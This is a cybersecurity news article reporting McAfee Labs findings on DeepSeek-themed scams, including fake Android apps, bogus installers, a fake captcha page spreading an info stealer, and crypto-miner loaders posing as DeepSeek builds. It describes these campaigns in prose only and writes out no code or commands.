Login
iscover
Share this article on:
Powered by
MOMENTUM
MEDIA
Powered by MOMENTUMMEDIA
Fake installers, malware droppers, and info stealers were all deployed under the cover of the popular Chinese chatbot.
For a while in January and February this year, it seemed the Chinese AI chatbot DeepSeek was everywhere – it was a hot ticket item in the Apple and Android app stores and sparked interest in the business community due to its relative cheapness and open-source availability.
Soon after, it made headlines after being banned by multiple governments – including in Australia – over possible links to the People’s Republic of China (PRC) government, but the horse had well and truly bolted, and DeepSeek remained highly sought after, especially in internet searches.
Which, of course, has made it a major boon for scammers and cyber criminals.
Researchers at McAfee Labs – the threat research division of security company McAfee – observed multiple campaigns taking advantage of DeepSeek’s popularity to spread malware, install other apps entirely, and even deploy crypto-miners.
Multiple Android apps used the DeepSeek icon to trick victims into downloading completely unrelated apps, driving revenue and download counts, while other installers purporting to be DeepSeek installed completely different apps, such as Audacity and WinManager. This allowed affiliates who rely upon pay-per-install commissions to spike their revenue by taking advantage of the DeepSeek craze.
In another instance, McAfee Labs observed malicious actors using DeepSeek-themed fake captcha pages. Fake captchas are nothing new and are often used to spread the Lumma Stealer info stealer.
“In this instance, the website deepseekcaptcha[.]top pretends to offer a partnership program for content creators,” McAfee Labs said in a recent blog post.
“They are utilising the technique called ‘brand impersonation’, where they’re using DeepSeek’s icons and colour scheme to appear as the original website.”
After registering for the partner program, the victim is directed to what appears to be a legitimate captcha page that asks them to follow some unusual steps to verify they’re a human, including pressing Windows+R to bring up a verification window and press CTRL-V, but when OK is clicked, it actually installs malware capable of stealing financial data from the compromised device.
In another case, several versions of DeepSeek – DeepSeek-VL2.Developer.Edition.exe, DeepSeek-R1.Leaked.Version.exe, and DeepSeek-VL2.ISO.exe – were actually loaders for crypto-miners. After loading a PowerShell script from malicious command and control infrastructure, the loader bypasses system policies, installs the script, and makes changes to the system registry to maintain persistence.
Once all that is done, the loader contacts the C2 server again, this time to download the parameters that will begin the Monero mining process, slowing down the device and quite possibly leaving it open to further compromise.
“The attacker purposely mines Monero cryptocurrency, as it prioritises anonymity, making it impossible to track the movements of funds,” McAfee Labs said.
“This makes it a popular coin by a number of crypto-miners.”
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.
Be the first to hear the latest developments in the cyber industry.
